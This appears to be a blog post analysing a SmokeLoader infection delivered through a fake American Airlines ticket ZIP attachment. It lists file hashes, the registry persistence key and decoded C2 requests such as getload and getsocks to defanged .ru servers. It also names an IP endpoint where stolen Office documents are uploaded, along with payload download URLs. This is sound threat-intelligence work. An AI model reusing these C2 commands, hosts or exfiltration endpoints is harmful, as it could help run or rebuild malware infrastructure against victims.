American Airlines Ticket Attachment

Subject: Order#4532104
Attachment: Ticket_American_Airlines_ID3457-144.zip

American Airlines

The sample contained a SmokeLoader payload within attachment. It had following properties:

File: Ticket_American_Airlines_ID3457-144.exe
MD5: 0b2b79189fd6e04a644c647cbebdd757
Size: 1,35,168 bytes
Path: C:\Documents and Settings\nightrover\Application Data\DD8F30.exe

The following registry key is created to ensure the file starts with each system reboot:

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Microsoft Windows
“C:\Documents and Settings\nightrover\Application Data\DD8F30.exe”

The following network traffic is observed, related to Smoke Loader (All “smk=” commands can be decoded with Base64 and then XOR’ed with 0x02):

  • Google.com

Likely a connectivity test.

  • POST ofalaskas14[.]ru/wen/index.php

The infected host POSTs the following to the server
cmd=grab&data=&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZycG16ew==’ which decodes to ‘.cmd=getproxy’
This downloads encoded data, likely the SOCKS proxy module available as an add-on for Smoke Loader.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZxbWFpcSRubWVrbD9EQTtBNkZEMjM0MUYwOkc6MkMzRzFENTo2MDY2NjBBQTAxRkY6RDEyJHJtcHY/MTE0NjA=’ which decodes to
‘.cmd=getsocks&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&port=33642’
This likely indicates the SOCKS proxy port.

  • POST ofalaskas14[.]ru/wen/index.php

Data posted is ‘smk=AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbGNuP21p’ which decodes to
‘.cmd=getload&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&sel=19mar&ver=5.1&bits=0&final=ok’
The server returns ‘Smk6’ which indicates that there are 6 files for download.

  • POST tropic18854[.]ru/ddn/index.php

Data posted is ‘AmFvZj9lZ3ZubWNmJG5tZWtsP0RBO0E2RkQyMzQxRjA6RzoyQzNHMUQ1OjYwNjY2MEFBMDFGRjpEMTIkcWduPzM7b2NwJHRncD83LDMkYGt2cT8yJGRrbmc/cA==’ which decodes to
‘.cmd=getload&login=FC9C4DF0163D28E80A1E3F78424442CC23DD8F30&sel=19mar&ver=5.1&bits=0&file=r’
The server redirects to the first file to be downloaded via a location header. This is repeated for each of the 6 files where file=0 increases with each download.

One of the file SmokeLoader downloads is a Office Document grabber. During our analysis we observed it searching for all Office documents, archiving them as a ZIP file and uploading to the server shown below:

It then uploads an archive made of all the .XLS and .DOC files collected from victim machine to

91.201.4.62:8000 – filename=tcrlsgun.zip – group_id=1486090109 – password=nohifoaa

The following files were downloaded:

http://www.theoldpalmerhouse[.]com/orderspro/template/images/1.exe
http://www.wgohwugo[.]com/images/obits/_vti_cnf/1.exe

MD5: e7501c4a9d19135a6d6f357216289324
Size: 4,09,600 bytes
AV detection indicates that it is likely a rogue AV variant.

http://www.wgohwugo[.]com/images/obits/_vti_cnf/pod.exe

MD5: 864f1cf79e92631168797a7ed8cb7c99
Size: 6,31,808 bytes
AV detection indicated that it is likely a Downloader/Backdoor

Observed network communications include the following:

  • report.31q93ce93k7ywsk931.com /?s5e55k=%96%9B%A1%D0%D6%AA%91%94c%A4m%96%C8%C6kf%A2%98%AA%DA%AC%CFkjac%94%A8%A5%AC%99%9Df%5B%E2%E8%A2%E7%E5%CA%C4T%A8%9A%D5vf%95%9BjY%D7%A5%E0%B4%D8%D9f%88%84T%D0%D8%D1%B0v%9Dmx%9F%A8%AA%A1%B3%A2%BAtge%B4ny%99%A7%7Dk%A1%7B%B2%AC%B8%9Fjhuo%9A%95%DF%D8%A8%A2ee%9B%A2%95%A3%A0%A2%A4%5Ecb%A1ic%93%95ic%9B%5D%EF%B4%A3%9Bica%5E%9B%A6%91
  • report.iq931o9oc7931g9i.com/?3s7931y=%96%9B%A1%D0%D6%AA%91%CA%A3lg%94%D4%9A%A1%96n%9Ad%94%A0%9D%9Be%93%A4%9El%ABp%9Dkb%9F%E9%DB%AD%E6%E8%CC~%8F%E6%A2%97n%A2k%A5%94%5D%A5%A1%98%A4%9E%D7%5B%B8%C2%93%A0%DC%9Bvti%B1%B5%99%A6%B4%A3%B8%5E%AF%B7mgt%A4%7F%A5%A5%7Bqiu%A0n%AEb%94%A4%B1t%AA%5D%AB%98%A4%B6%A3%95%A0%9F%A2%A6%5E%99%A1icb%9Fi%9F%93gica%8D%AF%A6%5E%93%9F%9Dc%A3opW

Both these requests resulted in 301 Moved Permanently – Location: hxxp://www.bing.com/

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: